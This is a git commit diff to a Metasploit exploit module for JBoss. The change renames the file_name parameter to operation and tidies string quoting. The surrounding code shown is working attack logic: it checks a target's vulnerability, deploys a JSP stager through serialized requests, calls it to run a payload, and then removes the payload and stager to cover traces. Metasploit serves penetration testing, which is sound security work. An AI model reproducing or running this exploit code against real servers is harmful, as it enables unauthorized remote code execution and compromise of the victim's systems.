Switch variable from file_name to operation
jvazquez-r7
parent
b003d8f750
commit
4c72b096b6
|
|
@ -88,9 +88,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_serialized_request('version.bin')
|
||||
res = send_serialized_request('version')
|
||||
if res.nil?
|
||||
vprint_error("Connection timed out")
|
||||
vprint_error('Connection timed out')
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res.code != 200
|
||||
vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
|
||||
|
|
@ -103,7 +103,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
|
||||
|
||||
if res.body =~ /ServletException/ # Simple check, if we caused an exception.
|
||||
vprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
|
||||
vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
|
|
@ -134,8 +134,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'jsp_code' => generate_stager(name_parameter, content_parameter)
|
||||
}
|
||||
|
||||
print_status("Deploying stager")
|
||||
send_serialized_request('installstager.bin', replace_values)
|
||||
print_status('Deploying stager')
|
||||
send_serialized_request('installstager', replace_values)
|
||||
print_status("Calling stager: #{stager_uri}")
|
||||
call_uri_mtimes(stager_uri, 5, 'GET')
|
||||
|
||||
|
|
@ -167,14 +167,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res = call_uri_mtimes(payload_uri,5, 'GET')
|
||||
|
||||
# Remove the payload through stager
|
||||
print_status("Removing payload through stager")
|
||||
print_status('Removing payload through stager')
|
||||
delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
|
||||
res = send_request_cgi({'uri' => delete_payload_uri})
|
||||
|
||||
# Remove the stager
|
||||
print_status("Removing stager")
|
||||
send_serialized_request('removestagerfile.bin', replace_values)
|
||||
send_serialized_request('removestagerdirectory.bin', replace_values)
|
||||
print_status('Removing stager')
|
||||
send_serialized_request('removestagerfile', replace_values)
|
||||
send_serialized_request('removestagerdirectory', replace_values)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
@ -225,28 +225,28 @@ EOT
|
|||
end
|
||||
|
||||
|
||||
def send_serialized_request(file_name , replace_params = {})
|
||||
def send_serialized_request(operation , replace_params = {})
|
||||
data = ''
|
||||
case file_name
|
||||
when 'version.bin'
|
||||
case operation
|
||||
when 'version'
|
||||
data = build_get_version.encode
|
||||
when 'osname.bin'
|
||||
when 'osname'
|
||||
data = build_get_os.encode
|
||||
when 'osarch.bin'
|
||||
when 'osarch'
|
||||
data = build_get_arch.encode
|
||||
when 'installstager.bin'
|
||||
when 'installstager'
|
||||
data = build_install_stager(
|
||||
war_name: replace_params['regex_app_base'],
|
||||
jsp_name: replace_params['regex_jsp_name'],
|
||||
data: replace_params['jsp_code']
|
||||
).encode
|
||||
when 'removestagerfile.bin'
|
||||
when 'removestagerfile'
|
||||
data = build_delete_stager_file(
|
||||
dir: "#{replace_params['regex_app_base']}.war",
|
||||
file: replace_params['regex_jsp_name'],
|
||||
extension: '.jsp'
|
||||
).encode
|
||||
when 'removestagerdirectory.bin'
|
||||
when 'removestagerdirectory'
|
||||
data = build_delete_stager_file(
|
||||
dir: './',
|
||||
file: replace_params['regex_app_base'],
|
||||
|
|
@ -269,7 +269,7 @@ EOT
|
|||
|
||||
|
||||
unless res && res.code == 200
|
||||
print_error("Failed: Error requesting preserialized request #{file_name}")
|
||||
print_error("Failed: Error requesting preserialized request #{operation}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
|
@ -335,8 +335,8 @@ EOT
|
|||
|
||||
# Try to autodetect the target platform
|
||||
def detect_platform
|
||||
print_status("Attempting to automatically detect the platform")
|
||||
res = send_serialized_request("osname.bin")
|
||||
print_status('Attempting to automatically detect the platform')
|
||||
res = send_serialized_request('osname')
|
||||
|
||||
if res.body =~ /(Linux|FreeBSD|Windows)/i
|
||||
os = $1
|
||||
|
|
@ -353,8 +353,8 @@ EOT
|
|||
|
||||
# Try to autodetect the architecture
|
||||
def detect_architecture
|
||||
print_status("Attempting to automatically detect the architecture")
|
||||
res = send_serialized_request("osarch.bin")
|
||||
print_status('Attempting to automatically detect the architecture')
|
||||
res = send_serialized_request('osarch')
|
||||
if res.body =~ /(i386|x86)/i
|
||||
arch = $1
|
||||
if arch =~ /i386|x86/i
|
||||
|
|
|
|||
Loading…
Reference in New Issue